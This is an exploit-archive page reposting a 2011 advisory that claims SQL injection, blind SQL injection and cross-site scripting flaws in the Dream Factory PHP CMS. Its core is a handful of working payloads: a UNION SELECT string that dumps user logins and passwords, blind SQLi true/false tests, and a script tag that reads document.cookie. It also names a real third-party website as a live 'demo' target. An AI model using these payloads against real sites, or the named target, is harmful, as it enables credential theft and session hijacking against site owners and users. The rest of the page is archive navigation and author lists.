Dream Factory Cross Site Scripting / SQL Injection

Dream Factory Cross Site Scripting / SQL Injection: Posted Aug 31, 2011; Authored by OuTLaWz; Dream Factory suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 83855ed3c865d27b7ad806365861ac6411c9acce9f08a695965b36dc3dd03325; Download | Favorite | View

Dream Factory Cross Site Scripting / SQL Injection

===================================================================
Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability
===================================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                 ###########################################          1
0                 I'm The_Exploited member from Inj3ct0r Team          1
1                 ###########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: The_Exploited

@Title: Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability

@Author: OuTLaWz aka The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Yahoo Messenger: user_31337@yahoo.com

@Site: WwW.SecuritySpl0its.CoM

@Path: http://www.mysite.com/index.php?news_id=[SQL] or [Blind SQL] or [XSS]

@SQL Injection: -null+union+all+select+null,null,concat(login,0x3a,password),null,null,null,null,null+from+user

@Blind SQL Injection: +and+1=1 - +and+1=2

@XSS: "><script>alert(document.cookie)</script>

@Demo: http://www.fipavterni.it/index.php?news_id=[SQL] or [Blind SQL] or [XSS]

@Platform: PHP

@CMS Version: All

@CMS Download: http://www.dreamfactorydesign.it/


# 1337day.com [2010-07-11]

Top Authors In Last 30 Days

Red Hat 252 files
indoushka 165 files
Jay Turla 150 files
Ubuntu 71 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

Dream Factory Cross Site Scripting / SQL Injection

Dream Factory Cross Site Scripting / SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Dream Factory Cross Site Scripting / SQL Injection

Share This

Dream Factory Cross Site Scripting / SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems